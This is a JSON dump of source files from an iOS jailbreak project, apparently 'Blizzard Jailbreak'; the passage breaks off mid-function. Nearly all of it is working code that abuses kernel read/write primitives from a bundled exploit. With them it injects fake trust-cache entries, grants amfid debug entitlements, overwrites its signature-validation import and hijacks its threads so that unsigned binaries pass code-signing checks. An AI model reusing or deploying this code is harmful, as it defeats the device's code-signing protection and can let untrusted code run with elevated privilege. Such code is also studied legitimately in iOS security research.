[
  {
    "path": ".gitignore",
    "content": ".DS_Store\n"
  },
  {
    "path": "AMFI Utilities/amfi_utils.h",
    "content": "#import <stdio.h>\n#import <sys/types.h>\n#import \"../AMFI Utilities/cs_blob.h\"\n\n#define MACHO(p) ((*(unsigned int *)(p) & ~1) == 0xfeedface)\n\ntypedef char hash_t[20];\n\nstruct trust_chain {\n    uint64_t next;\n    unsigned char uuid[16];\n    unsigned int count;\n} __attribute__((packed));\n\n\nvoid *load_bytes(FILE *file, off_t offset, size_t size);\nint strtail(const char *str, const char *tail);\nvoid getSHA256inplace(const uint8_t* code_dir, uint8_t *out);\nuint8_t *getSHA256(const uint8_t* code_dir);\nuint8_t *getCodeDirectory(const char* name);\nuint64_t ubc_cs_blob_allocate(vm_size_t size);\nvoid kern_free(uint64_t addr, vm_size_t size);\nint cs_validate_csblob(const uint8_t *addr, size_t length, CS_CodeDirectory **rcd, CS_GenericBlob **rentitlements);\nuint64_t getCodeSignatureLC(FILE *file, int64_t *machOff);\nint addBinaryToAMFITrustCache(const char *path);\nint amfiTrustHash(hash_t hash);\nconst struct cs_hash *cs_find_md(uint8_t type);\n"
  },
  {
    "path": "AMFI Utilities/amfi_utils.m",
    "content": "//  Comes from Electra, adapted for FAT binary support by Jake James\n//\n//  amfi_utils.c\n//  electra\n//\n//  Created by Jamie on 27/01/2018.\n//  Copyright © 2018 Electra Team. All rights reserved.\n//\n\n#include \"amfi_utils.h\"\n#include \"kernel_utils.h\"\n#include \"patchfinder64.h\"\n#include <stdlib.h>\n#include <mach-o/loader.h>\n#include <mach-o/fat.h>\n#include <CommonCrypto/CommonDigest.h>\n#include <Foundation/Foundation.h>\n#include \"../Kernel Utilities/kexecute.h\"\n#include \"../Kernel Utilities/kernel_utils.h\"\n#include \"../Exploits/sock_port/kernel_memory.h\"\n#include <sys/mman.h>\n\nuint32_t swap_uint32( uint32_t val ) {\n    val = ((val << 8) & 0xFF00FF00 ) | ((val >> 8) & 0xFF00FF );\n    return (val << 16) | (val >> 16);\n}\n\nuint32_t read_magic(FILE* file, off_t offset) {\n    uint32_t magic;\n    fseek(file, offset, SEEK_SET);\n    fread(&magic, sizeof(uint32_t), 1, file);\n    return magic;\n}\n\nvoid *load_bytes(FILE *file, off_t offset, size_t size) {\n    void *buf = calloc(1, size);\n    fseek(file, offset, SEEK_SET);\n    fread(buf, size, 1, file);\n    return buf;\n}\n\nvoid getSHA256inplace(const uint8_t* code_dir, uint8_t *out) {\n    if (code_dir == NULL) {\n        printf(\"AMFI TOOLS: NULL passed to getSHA256inplace!\\n\");\n        return;\n    }\n    uint32_t* code_dir_int = (uint32_t*)code_dir;\n    uint32_t realsize = 0;\n    for (int j = 0; j < 10; j++) {\n        if (swap_uint32(code_dir_int[j]) == 0xfade0c02) {\n            realsize = swap_uint32(code_dir_int[j+1]);\n            code_dir += 4*j;\n        }\n    }\n    CC_SHA256(code_dir, realsize, out);\n}\n\nuint8_t *getSHA256(const uint8_t* code_dir) {\n    uint8_t *out = malloc(CC_SHA256_DIGEST_LENGTH);\n    getSHA256inplace(code_dir, out);\n    return out;\n}\n\nuint8_t *getCodeDirectory(const char* name) {\n    FILE* fd = fopen(name, \"r\");\n    uint32_t magic;\n    fread(&magic, sizeof(magic), 1, fd);\n    fseek(fd, 0, SEEK_SET);\n    long 
off = 0, file_off = 0;\n    int ncmds = 0;\n    BOOL foundarm64 = false;\n    if (magic == MH_MAGIC_64) {\n        struct mach_header_64 mh64;\n        fread(&mh64, sizeof(mh64), 1, fd);\n        off = sizeof(mh64);\n        ncmds = mh64.ncmds;\n    }\n    else if (magic == MH_MAGIC) {\n        printf(\"AMFI TOOLS: %s is 32bit. What are you doing here?\\n\", name);\n        fclose(fd);\n        return NULL;\n    }\n    else if (magic == 0xBEBAFECA) {\n        size_t header_size = sizeof(struct fat_header);\n        size_t arch_size = sizeof(struct fat_arch);\n        size_t arch_off = header_size;\n        struct fat_header *fat = (struct fat_header*)load_bytes(fd, 0, header_size);\n        struct fat_arch *arch = (struct fat_arch *)load_bytes(fd, arch_off, arch_size);\n        int n = swap_uint32(fat->nfat_arch);\n        printf(\"AMFI TOOLS: Binary is FAT with %d architectures\\n\", n);\n        while (n-- > 0) {\n            magic = read_magic(fd, swap_uint32(arch->offset));\n            if (magic == 0xFEEDFACF) {\n                printf(\"AMFI TOOLS: Found arm64\\n\");\n                foundarm64 = true;\n                struct mach_header_64* mh64 = (struct mach_header_64*)load_bytes(fd, swap_uint32(arch->offset), sizeof(struct mach_header_64));\n                file_off = swap_uint32(arch->offset);\n                off = swap_uint32(arch->offset) + sizeof(struct mach_header_64);\n                ncmds = mh64->ncmds;\n                break;\n            }\n            arch_off += arch_size;\n            arch = load_bytes(fd, arch_off, arch_size);\n        }\n        if (!foundarm64) {\n            printf(\"AMFI TOOLS: No arm64? RIP\\n\");\n            fclose(fd);\n            return NULL;\n        }\n    }\n    else {\n        printf(\"AMFI TOOLS: %s is not a macho! (or has foreign endianness?) 
(magic: %x)\\n\", name, magic);\n        fclose(fd);\n        return NULL;\n    }\n    for (int i = 0; i < ncmds; i++) {\n        struct load_command cmd;\n        fseek(fd, off, SEEK_SET);\n        fread(&cmd, sizeof(struct load_command), 1, fd);\n        if (cmd.cmd == LC_CODE_SIGNATURE) {\n            uint32_t off_cs;\n            fread(&off_cs, sizeof(uint32_t), 1, fd);\n            uint32_t size_cs;\n            fread(&size_cs, sizeof(uint32_t), 1, fd);\n            \n            uint8_t *cd = malloc(size_cs);\n            fseek(fd, off_cs + file_off, SEEK_SET);\n            fread(cd, size_cs, 1, fd);\n            fclose(fd);\n            return cd;\n        } else {\n            off += cmd.cmdsize;\n        }\n    }\n    fclose(fd);\n    return NULL;\n}\n\n//from xerub\nint strtail(const char *str, const char *tail)\n{\n    size_t lstr = strlen(str);\n    size_t ltail = strlen(tail);\n    if (ltail > lstr) {\n        return -1;\n    }\n    str += lstr - ltail;\n    return memcmp(str, tail, ltail);\n}\n\nint cs_validate_csblob(const uint8_t *addr, size_t length, CS_CodeDirectory **rcd, CS_GenericBlob **rentitlements) {\n    uint64_t rcdptr = kalloc(sizeof(uint64_t));\n    uint64_t entptr = kalloc(sizeof(uint64_t));\n    \n    int ret = (int)kexecute(Find_cs_validate_csblob(), (uint64_t)addr, length, rcdptr, entptr, 0, 0, 0);\n    *rcd = (CS_CodeDirectory *)rk64(rcdptr);\n    *rentitlements = (CS_GenericBlob *)rk64(entptr);\n    \n    kfree(rcdptr, sizeof(uint64_t));\n    kfree(entptr, sizeof(uint64_t));\n    \n    return ret;\n}\n\nuint64_t ubc_cs_blob_allocate(vm_size_t size) {\n    if (size <= 0x1ff8) {\n        uint64_t size_p = kalloc(sizeof(vm_size_t));\n        if (!size_p) return 0;\n        kwrite(size_p, &size, sizeof(vm_size_t));\n        \n        uint64_t kall = Find_kalloc_canblock();\n        if (!kall) return 0;\n        \n        uint64_t site = Find_cs_blob_allocate_site();\n        if (!site) return 0;\n        \n        uint64_t alloced = 
kexecute(kall, size_p, 1, site, 0, 0, 0, 0);\n        if (!alloced) return 0;\n        \n        kfree(size_p, sizeof(vm_size_t));\n        alloced = ZmFixAddr(alloced);\n        return alloced;\n    }\n    else {\n        size = (size + 0x3fff) & ~0x3fff;\n        \n        uint64_t addrp = kalloc(sizeof(uint64_t));\n        if (!addrp) return 0;\n        \n        uint64_t kernel_map = Find_kernel_map();\n        if (!kernel_map) return 0;\n        \n        kernel_map = rk64(kernel_map);\n        if (!kernel_map) return 0;\n        \n        uint64_t alloc = Find_kernel_memory_allocate();\n        if (!alloc) return 0;\n        \n        kexecute(alloc, kernel_map, addrp, size, 0, 4, 17, 0);\n        addrp = rk64(addrp);\n        return addrp;\n    }\n}\n\nvoid kern_free(uint64_t addr, vm_size_t size) {\n    if (size > 0x1ff8) size = (size + 0x3fff) & ~0x3fff;\n    kexecute(Find_kfree(), addr, size, 0, 0, 0, 0, 0);\n}\n\nconst struct cs_hash *cs_find_md(uint8_t type) {\n    return (struct cs_hash *)rk64(Find_cs_find_md() + ((type - 1) * 8));\n}\n\nuint64_t getCodeSignatureLC(FILE *file, int64_t *machOff) {\n    size_t offset = 0;\n    struct load_command *cmd = NULL;\n    *machOff = -1;\n    uint32_t *magic = load_bytes(file, offset, sizeof(uint32_t));\n    int ncmds = 0;\n    \n    if (*magic != 0xFEEDFACF && *magic != 0xBEBAFECA) {\n        printf(\"AMFI TOOLS: File is not an arm64 or FAT macho!\\n\");\n        free(magic);\n        return 0;\n    }\n    \n    if(*magic == 0xBEBAFECA) {\n        uint32_t arch_off = sizeof(struct fat_header);\n        struct fat_header *fat = (struct fat_header*)load_bytes(file, 0, sizeof(struct fat_header));\n        bool foundarm64 = false;\n        int n = ntohl(fat->nfat_arch);\n        printf(\"AMFI TOOLS: Binary is FAT with %d architectures\\n\", n);\n        while (n-- > 0) {\n            struct fat_arch *arch = (struct fat_arch *)load_bytes(file, arch_off, sizeof(struct fat_arch));\n            if (ntohl(arch->cputype) 
== 0x100000c) {\n                printf(\"AMFI TOOLS: Found arm64\\n\");\n                offset = ntohl(arch->offset);\n                foundarm64 = true;\n                free(fat);\n                free(arch);\n                break;\n            }\n            free(arch);\n            arch_off += sizeof(struct fat_arch);\n        }\n        if (!foundarm64) {\n            printf(\"AMFI TOOLS: Binary does not have any arm64 slice\\n\");\n            free(fat);\n            free(magic);\n            return 0;\n        }\n    }\n    free(magic);\n    *machOff = offset;\n    struct mach_header_64 *mh64 = load_bytes(file, offset, sizeof(struct mach_header_64));\n    ncmds = mh64->ncmds;\n    free(mh64);\n    offset += sizeof(struct mach_header_64);\n    \n    for (int i = 0; i < ncmds; i++) {\n        cmd = load_bytes(file, offset, sizeof(struct load_command));\n        if (cmd->cmd == LC_CODE_SIGNATURE) {\n            free(cmd);\n            return offset;\n        }\n        offset += cmd->cmdsize;\n        free(cmd);\n    }\n    return 0;\n}\n\nint addBinaryToAMFITrustCache(const char *path) {\n    NSMutableArray *paths = [NSMutableArray array];\n    NSFileManager *fileManager = [NSFileManager defaultManager];\n    BOOL isDir = NO;\n    if (![fileManager fileExistsAtPath:@(path) isDirectory:&isDir]) {\n        printf(\"AMFI TRUST: Path does not exist!\\n\");\n        return -1;\n    }\n    NSURL *directoryURL = [NSURL URLWithString:@(path)];\n    NSArray *keys = [NSArray arrayWithObject:NSURLIsDirectoryKey];\n    if (isDir) {\n        NSDirectoryEnumerator *enumerator = [fileManager\n                                             enumeratorAtURL:directoryURL\n                                             includingPropertiesForKeys:keys\n                                             options:0\n                                             errorHandler:^(NSURL *url, NSError *error) {\n                                                 if (error) printf(\"AMFI TRUST: 
%s\\n\", [[error localizedDescription] UTF8String]);\n                                                 return YES;\n                                             }];\n        \n        for (NSURL *url in enumerator) {\n            NSError *error;\n            NSNumber *isDirectory = nil;\n            if (![url getResourceValue:&isDirectory forKey:NSURLIsDirectoryKey error:&error]) {\n                if (error) continue;\n            }\n            else if (![isDirectory boolValue]) {\n                int rv;\n                int fd;\n                uint8_t *p;\n                off_t sz;\n                struct stat st;\n                uint8_t buf[16];\n                char *fpath = strdup([[url path] UTF8String]);\n                if (strtail(fpath, \".plist\") == 0 || strtail(fpath, \".nib\") == 0 || strtail(fpath, \".strings\") == 0 || strtail(fpath, \".png\") == 0) {\n                    continue;\n                }\n                rv = lstat(fpath, &st);\n                if (rv || !S_ISREG(st.st_mode) || st.st_size < 0x4000) {\n                    continue;\n                }\n                fd = open(fpath, O_RDONLY);\n                if (fd < 0) {\n                    continue;\n                }\n                sz = read(fd, buf, sizeof(buf));\n                if (sz != sizeof(buf)) {\n                    close(fd);\n                    continue;\n                }\n                if (*(uint32_t *)buf != 0xBEBAFECA && !MACHO(buf)) {\n                    close(fd);\n                    continue;\n                }\n                p = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);\n                if (p == MAP_FAILED) {\n                    close(fd);\n                    continue;\n                }\n                [paths addObject:@(fpath)];\n                printf(\"AMFI TRUST: ADDING TO TRUST CACHE %s\\n\", fpath);\n                free(fpath);\n            }\n        }\n        if ([paths count] == 0) {\n            printf(\"AMFI TRUST: No 
files in %s passed the integrity checks!\\n\", path);\n            return -2;\n        }\n    }\n    else {\n        printf(\"AMFI TRUST: ADDING TO TRUST CACHE %s\\n\", path);\n        [paths addObject:@(path)];\n        int rv;\n        int fd;\n        uint8_t *p;\n        off_t sz;\n        struct stat st;\n        uint8_t buf[16];\n        \n        if (strtail(path, \".plist\") == 0 || strtail(path, \".nib\") == 0 || strtail(path, \".strings\") == 0 || strtail(path, \".png\") == 0) {\n            printf(\"AMFI TRUST Binary not an executable! Kernel doesn't like trusting data, geez\\n\");\n            return 2;\n        }\n        \n        rv = lstat(path, &st);\n        if (rv || !S_ISREG(st.st_mode) || st.st_size < 0x4000) {\n            printf(\"AMFI TRUST Binary too big\\n\");\n            return 3;\n        }\n        \n        fd = open(path, O_RDONLY);\n        if (fd < 0) {\n            printf(\"AMFI TRUST Don't have permission to open file\\n\");\n            return 4;\n        }\n        \n        sz = read(fd, buf, sizeof(buf));\n        if (sz != sizeof(buf)) {\n            close(fd);\n            printf(\"AMFI TRUST Failed to read from binary\\n\");\n            return 5;\n        }\n        if (*(uint32_t *)buf != 0xBEBAFECA && !MACHO(buf)) {\n            close(fd);\n            printf(\"AMFI TRUST Binary not a macho!\\n\");\n            return 6;\n        }\n        \n        p = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);\n        if (p == MAP_FAILED) {\n            close(fd);\n            printf(\"AMFI TRUST Failed to mmap file\\n\");\n            return 7;\n        }\n    }\n    uint64_t trust_chain = Find_trustcache();\n    printf(\"AMFI TRUST trust_chain at 0x%llx\\n\", trust_chain);\n    struct trust_chain fake_chain;\n    fake_chain.next = rk64(trust_chain);\n    arc4random_buf(fake_chain.uuid, 16);\n    int cnt = 0;\n    uint8_t hash[CC_SHA256_DIGEST_LENGTH];\n    hash_t *allhash = malloc(sizeof(hash_t) * [paths count]);\n    
for (int i = 0; i != [paths count]; ++i) {\n        uint8_t *cd = getCodeDirectory((char*)[[paths objectAtIndex:i] UTF8String]);\n        if (cd != NULL) {\n            getSHA256inplace(cd, hash);\n            memmove(allhash[cnt], hash, sizeof(hash_t));\n            ++cnt;\n        }\n        else {\n            printf(\"AMFI TRUST CD NULL\\n\");\n            continue;\n        }\n    }\n    fake_chain.count = cnt;\n    size_t length = (sizeof(fake_chain) + cnt * sizeof(hash_t) + 0x3FFF) & ~0x3FFF;\n    uint64_t kernel_trust = kalloc(length);\n    printf(\"AMFI TRUST allocated: 0x%zx => 0x%llx\\n\", length, kernel_trust);\n    kwrite(kernel_trust, &fake_chain, sizeof(fake_chain));\n    kwrite(kernel_trust + sizeof(fake_chain), allhash, cnt * sizeof(hash_t));\n#if __arm64e__\n    Kernel_Execute(Find_pmap_load_trust_cache_ppl(), kernel_trust, length, 0, 0, 0, 0, 0);\n#else\n    wk64(trust_chain, kernel_trust);\n#endif\n    free(allhash);\n    return 0;\n}\n\nint amfiTrustHash(hash_t hash) {\n    uint64_t trust_chain = Find_trustcache();\n    printf(\"AMFI TRUST trust_chain at 0x%llx\\n\", trust_chain);\n    struct trust_chain fake_chain;\n    fake_chain.next = rk64(trust_chain);\n    arc4random_buf(fake_chain.uuid, 16);\n    fake_chain.count = 1;\n    size_t length = (sizeof(fake_chain) + sizeof(hash_t) + 0x3FFF) & ~0x3FFF;\n    uint64_t kernel_trust = kalloc(length);\n    printf(\"AMFI TRUST allocated: 0x%zx => 0x%llx\\n\", length, kernel_trust);\n    kwrite(kernel_trust, &fake_chain, sizeof(fake_chain));\n    kwrite(kernel_trust + sizeof(fake_chain), hash, sizeof(hash_t));\n#if __arm64e__\n    kexecute(Find_pmap_load_trust_cache_ppl(), kernel_trust, length, 0, 0, 0, 0, 0);\n#else\n    wk64(trust_chain, kernel_trust);\n#endif\n    return 0;\n}\n"
  },
  {
    "path": "AMFI Utilities/amfid.h",
    "content": "#import <dlfcn.h>\n#import <stdio.h>\n#import <unistd.h>\n#import <sys/types.h>\n#import <mach/mach.h>\n#import <mach-o/loader.h>\n#import <mach/error.h>\n#import <errno.h>\n#import <stdlib.h>\n#import <sys/sysctl.h>\n#import <dlfcn.h>\n#import <sys/mman.h>\n#import <spawn.h>\n#import <sys/stat.h>\n#import <pthread.h>\n#import <signal.h>\n#import <mach/thread_state.h>\n#import <mach/thread_status.h>\n#import <mach/thread_info.h>\n\nvoid* AMFIDExceptionHandler(void* arg);\nint setAmfidExceptionHandler(mach_port_t amfid_task_port, void *(exceptionHandler)(void*));\nuint64_t patchAMFID(void);\n\n#pragma pack(4)\ntypedef struct {\n    mach_msg_header_t Head;\n    mach_msg_body_t msgh_body;\n    mach_msg_port_descriptor_t thread;\n    mach_msg_port_descriptor_t task;\n    NDR_record_t NDR;\n} exception_raise_request; // the bits we need at least\n\ntypedef struct {\n    mach_msg_header_t Head;\n    NDR_record_t NDR;\n    kern_return_t RetCode;\n} exception_raise_reply;\n#pragma pack()\n\n#define amfid_MISValidateSignatureAndCopyInfo_import_offset 0x4150\n"
  },
  {
    "path": "AMFI Utilities/amfid.m",
    "content": "// From JelbrekLib, by Jake James!\n\n#import \"../AMFI Utilities/amfid.h\"\n#import \"../AMFI Utilities/amfid_mem.h\"\n#import \"../AMFI Utilities/amfi_utils.h\"\n#import \"../AMFI Utilities/amfid_tools.h\"\n#import \"../Kernel Utilities/kernel_utils.h\"\n#import \"../AMFI Utilities/cs_blob.h\"\n#import \"../Exploits/sock_port/offsetof.h\"\n#import <Foundation/Foundation.h>\n#include \"../PatchFinder/patchfinder64.h\"\n#include \"../AMFI Utilities/osobject.h\"\n#include \"../Blizzard Jailbreak/blizzardJailbreak.h\"\n\npthread_t exceptionThread;\nstatic mach_port_name_t AMFID_ExceptionPort = MACH_PORT_NULL;\nuint64_t origAMFID_MISVSACI = 0;\nuint64_t amfid_base_old;\n\nBOOL entitlePidOnAMFI(pid_t pid, const char *ent, BOOL val) {\n    if (!pid) return NO;\n    uint64_t proc = proc_of_pid(pid);\n    uint64_t ucred = rk64(proc + off_p_ucred);\n    uint64_t cr_label = rk64(ucred + off_ucred_cr_label);\n    uint64_t entitlements = rk64(cr_label + off_amfi_slot);\n    if (OSDictionary_GetItem(entitlements, ent) == 0) {\n        printf(\"AMFI TOOLS: Setting Entitlements...\\n\");\n        uint64_t entval = OSDictionary_GetItem(entitlements, ent);\n        printf(\"AMFI TOOLS: before: %s is 0x%llx\\n\", ent, entval);\n        OSDictionary_SetItem(entitlements, ent, (val) ? Find_OSBoolean_True() : Find_OSBoolean_False());\n        entval = OSDictionary_GetItem(entitlements, ent);\n        printf(\"AMFI TOOLS: after: %s is 0x%llx\\n\", ent, entval);\n        return (entval) ? 
YES : NO;\n    }\n    return YES;\n}\n\nuint64_t binary_load_address(mach_port_t tp) {\n    kern_return_t err;\n    mach_msg_type_number_t region_count = VM_REGION_BASIC_INFO_COUNT_64;\n    memory_object_name_t object_name = MACH_PORT_NULL; /* unused */\n    mach_vm_size_t target_first_size = 0x1000;\n    mach_vm_address_t target_first_addr = 0x0;\n    struct vm_region_basic_info_64 region = {0};\n    printf(\"AMFI TOOLS: About to call mach_vm_region\\n\");\n    err = mach_vm_region(tp, &target_first_addr, &target_first_size, VM_REGION_BASIC_INFO_64, (vm_region_info_t)&region, &region_count, &object_name);\n    if (err != KERN_SUCCESS) {\n        printf(\"AMFI TOOLS: Failed to get the region: %s\\n\", mach_error_string(err));\n        return -1;\n    }\n    printf(\"AMFI TOOLS: Got base address\\n\");\n    return target_first_addr;\n}\n\n#if !__arm64e__\nvoid* AMFIDExceptionHandler(void* arg) {\n    uint32_t size = 0x1000;\n    mach_msg_header_t* msg = malloc(size);\n    for(;;) {\n        kern_return_t ret;\n        printf(\"AMFI TOOLS: AMFID: Calling mach_msg to receive exception message from amfid\\n\");\n        ret = mach_msg(msg, MACH_RCV_MSG | MACH_MSG_TIMEOUT_NONE, 0, size, AMFID_ExceptionPort, 0, 0);\n        if (ret != KERN_SUCCESS){\n            printf(\"AMFI TOOLS: AMFID: Error receiving exception port: %s\\n\", mach_error_string(ret));\n            continue;\n        } else {\n            printf(\"AMFI TOOLS: AMFID: Got called!\\n\");\n            exception_raise_request* req = (exception_raise_request*)msg;\n            mach_port_t thread_port = req->thread.name;\n            mach_port_t task_port = req->task.name;\n            _STRUCT_ARM_THREAD_STATE64 old_state = {0};\n            mach_msg_type_number_t old_stateCnt = sizeof(old_state)/4;\n            ret = thread_get_state(thread_port, ARM_THREAD_STATE64, (thread_state_t)&old_state, &old_stateCnt);\n            if (ret != KERN_SUCCESS){\n                printf(\"AMFI TOOLS: Error getting thread 
state: %s\\n\", mach_error_string(ret));\n                continue;\n            }\n            printf(\"AMFI TOOLS: Got thread state!\\n\");\n            _STRUCT_ARM_THREAD_STATE64 new_state;\n            memcpy(&new_state, &old_state, sizeof(_STRUCT_ARM_THREAD_STATE64));\n            char* filename = (char*)AmfidRead(new_state.__x[25], 1024);\n            uint8_t *orig_cdhash = (uint8_t*)AmfidRead(new_state.__x[24], CS_CDHASH_LEN);\n            printf(\"AMFI TOOLS:  Got request for: %s\\n\", filename);\n            printf(\"AMFI TOOLS: Original cdhash: \\n\\t\");\n            for (int i = 0; i < CS_CDHASH_LEN; i++) {\n                printf(\"AMFI TOOLS: Original CDHash%02x \", orig_cdhash[i]);\n            }\n            printf(\"\\n\");\n            if (strlen((char*)orig_cdhash)) {\n                amfid_base_old = binary_load_address(task_port);\n                printf(\"AMFI TOOLS: Jumping thread to 0x%llx\\n\", origAMFID_MISVSACI);\n                new_state.__pc = origAMFID_MISVSACI;\n            } else {\n                uint8_t* code_directory = getCodeDirectory(filename);\n                if (!code_directory) {\n                    printf(\"AMFI TOOLS: Can't get code directory\\n\");\n                    goto end;\n                }\n                uint8_t cd_hash[CS_CDHASH_LEN];\n                if (parse_superblob(code_directory, cd_hash)) {\n                    printf(\"AMFI TOOLS: parse_superblob failed\\n\");\n                    goto end;\n                }\n                printf(\"AMFI TOOLS: New cdhash: \\n\\t\");\n                for (int i = 0; i < CS_CDHASH_LEN; i++) {\n                    printf(\"AMFI TOOLS: CDHash%02x \", cd_hash[i]);\n                }\n                printf(\"\\n\");\n                new_state.__pc = origAMFID_MISVSACI;\n                ret = mach_vm_write(task_port, old_state.__x[24], (vm_offset_t)&cd_hash, 20);\n                if (ret == KERN_SUCCESS)\n                {\n                    printf(\"AMFI TOOLS: 
Wrote the cdhash into amfid\\n\");\n                } else {\n                    printf(\"AMFI TOOLS: Unable to write the cdhash into amfid!\\n\");\n                }\n                AmfidWrite_32bits(old_state.__x[20], 1);\n                new_state.__pc = (old_state.__lr & 0xfffffffffffff000) + 0x1000; // 0x2dacwhere to continue\n                \n                printf(\"AMFI TOOLS: Old PC: 0x%llx, new PC: 0x%llx\\n\", old_state.__pc, new_state.__pc);\n            }\n\n            ret = thread_set_state(thread_port, 6, (thread_state_t)&new_state, sizeof(new_state)/4);\n            if (ret != KERN_SUCCESS) {\n                printf(\"AMFI TOOLS: Failed to set new thread state %s\\n\", mach_error_string(ret));\n            } else {\n                printf(\"AMFI TOOLS: Success setting new state for amfid!\\n\");\n            }\n            \n            exception_raise_reply reply = {0};\n            reply.Head.msgh_bits = MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(req->Head.msgh_bits), 0);\n            reply.Head.msgh_size = sizeof(reply);\n            reply.Head.msgh_remote_port = req->Head.msgh_remote_port;\n            reply.Head.msgh_local_port = MACH_PORT_NULL;\n            reply.Head.msgh_id = req->Head.msgh_id + 0x64;\n            reply.NDR = req->NDR;\n            reply.RetCode = KERN_SUCCESS;\n            ret = mach_msg(&reply.Head, 1, (mach_msg_size_t)sizeof(reply), 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);\n            mach_port_deallocate(mach_task_self(), thread_port);\n            mach_port_deallocate(mach_task_self(), task_port);\n            if (ret != KERN_SUCCESS){\n                printf(\"AMFI TOOLS: Failed to send the reply to the exception message %s\\n\", mach_error_string(ret));\n            } else{\n                printf(\"AMFI TOOLS: Replied to the amfid exception...\\n\");\n            }\n        end:;\n            free(filename);\n            free(orig_cdhash);\n        }\n    }\n    return NULL;\n}\n\nint 
setAmfidExceptionHandler(mach_port_t amfid_task_port, void *(exceptionHandler)(void*)){\n    if (!MACH_PORT_VALID(amfid_task_port)) {\n        printf(\"AMFI TOOLS: Invalid amfid task port\\n\");\n        return 1;\n    }\n    mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &AMFID_ExceptionPort);\n    mach_port_insert_right(mach_task_self(), AMFID_ExceptionPort, AMFID_ExceptionPort, MACH_MSG_TYPE_MAKE_SEND);\n    if (!MACH_PORT_VALID(AMFID_ExceptionPort)) {\n        printf(\"AMFI TOOLS: Invalid amfid exception port\\n\");\n        return 1;\n    }\n    \n    printf(\"AMFI TOOLS: amfid_task_port = 0x%x\\n\", amfid_task_port);\n    printf(\"AMFI TOOLS: AMFID_ExceptionPort = 0x%x\\n\", AMFID_ExceptionPort);\n    kern_return_t ret = task_set_exception_ports(amfid_task_port, EXC_MASK_ALL, AMFID_ExceptionPort, EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES, ARM_THREAD_STATE64);\n    if (ret != KERN_SUCCESS){\n        printf(\"AMFI TOOLS: Error setting amfid exception port: %s\\n\", mach_error_string(ret));\n    } else {\n        printf(\"AMFI TOOLS: Success setting amfid exception port!\\n\");\n        pthread_create(&exceptionThread, NULL, exceptionHandler, NULL);\n        return 0;\n    }\n    return 1;\n}\n\nuint64_t patchAMFID() {\n    printf(\"AMFI TOOLS: Patching AMFID...\\n\");\n    pid_t amfid_pid = pid_of_procName(\"amfid\");\n    printf(\"AMFI TOOLS: amfid's PID: %d\\n\", amfid_pid);\n    entitlePidOnAMFI(amfid_pid, \"get-task-allow\", YES);\n    setcsflags(amfid_pid);\n    printf(\"AMFI TOOLS: Getting task port\\n\");\n    mach_port_t amfid_task_port;\n    kern_return_t kr = task_for_pid(mach_task_self(), amfid_pid, &amfid_task_port);\n    \n    if (kr) {\n        printf(\"AMFI TOOLS: Failed to get amfid's task :(\\n\\tError: %s\\n\", mach_error_string(kr));\n        return -1;\n    }\n    \n    if (!MACH_PORT_VALID(amfid_task_port)) {\n        printf(\"AMFI TOOLS: Failed to get amfid's task port!\\n\");\n        return -1;\n    }\n    \n    
printf(\"AMFI TOOLS: Got amfid's task port? :) 0x%x\\n\", amfid_task_port);\n    init_amfid_mem(amfid_task_port);\n    setAmfidExceptionHandler(amfid_task_port, AMFIDExceptionHandler);\n    printf(\"AMFI TOOLS: About to search for the binary load address\\n\");\n    amfid_base_old = binary_load_address(amfid_task_port);\n    printf(\"AMFI TOOLS: Amfid load address: 0x%llx\\n\", amfid_base_old);\n    mach_vm_size_t sz;\n    kr = mach_vm_read_overwrite(amfid_task_port, amfid_base_old+amfid_MISValidateSignatureAndCopyInfo_import_offset, 8, (mach_vm_address_t)&origAMFID_MISVSACI, &sz);\n    \n    if (kr != KERN_SUCCESS) {\n        printf(\"AMFI TOOLS: Error reading MISVSACI: %s\\n\", mach_error_string(kr));\n        return -1;\n    }\n    printf(\"AMFI TOOLS: Original MISVSACI 0x%llx\\n\", origAMFID_MISVSACI);\n    AmfidWrite_64bits(amfid_base_old + amfid_MISValidateSignatureAndCopyInfo_import_offset, 0x4141414141414141);\n    printf(\"[i] AMFI TOOLS: AMFID hopefully patched\\n\");\n    return origAMFID_MISVSACI;\n}\n#endif\n"
  },
  {
    "path": "AMFI Utilities/amfid_mem.h",
    "content": "#import <stdio.h>\n#import <mach-o/loader.h>\n#import <stdlib.h>\n#import <fcntl.h>\n#import <unistd.h>\n#import <errno.h>\n#import <mach/mach.h>\n#import <sys/stat.h>\n\nvoid init_amfid_mem(mach_port_t amfid_tp);\nvoid* AmfidRead(uint64_t addr, uint64_t len);\nvoid AmfidWrite_8bits(uint64_t addr, uint8_t val);\nvoid AmfidWrite_64bits(uint64_t addr, uint64_t val);\nvoid AmfidWrite_32bits(uint64_t addr, uint32_t val);\nvoid* AmfidRead(uint64_t addr, uint64_t len);\n"
  },
  {
    "path": "AMFI Utilities/amfid_mem.m",
    "content": "#import \"amfid_mem.h\"\n#import \"kernel_utils.h\"\n#import <Foundation/Foundation.h>\n\nstatic mach_port_t amfid_task_port;\n\nvoid init_amfid_mem(mach_port_t amfid_tp) {\n    amfid_task_port = amfid_tp;\n}\n\nvoid* AmfidRead(uint64_t addr, uint64_t len) {\n    kern_return_t ret;\n    vm_offset_t buf = 0;\n    mach_msg_type_number_t num = 0;\n    ret = mach_vm_read(amfid_task_port, addr, len, &buf, &num);\n    \n    if (ret != KERN_SUCCESS) {\n        printf(\"AMFI TOOLS: amfid read failed (0x%llx)\\n\", addr);\n        return NULL;\n    }\n    uint8_t* outbuf = malloc(len);\n    memcpy(outbuf, (void*)buf, len);\n    mach_vm_deallocate(mach_task_self(), buf, num);\n    return outbuf;\n}\n\nvoid AmfidWrite_8bits(uint64_t addr, uint8_t val) {\n    kern_return_t err = mach_vm_write(amfid_task_port, addr, (vm_offset_t)&val, 1);\n    if (err != KERN_SUCCESS) {\n        printf(\"AMFI TOOLS: amfid write failed (0x%llx)\\n\", addr);\n    }\n}\n\nvoid AmfidWrite_32bits(uint64_t addr, uint32_t val) {\n    kern_return_t err = mach_vm_write(amfid_task_port, addr, (vm_offset_t)&val, 4);\n    if (err != KERN_SUCCESS) {\n        printf(\"AMFI TOOLS: amfid write failed (0x%llx)\\n\", addr);\n    }\n}\n\n\nvoid AmfidWrite_64bits(uint64_t addr, uint64_t val) {\n    kern_return_t err = 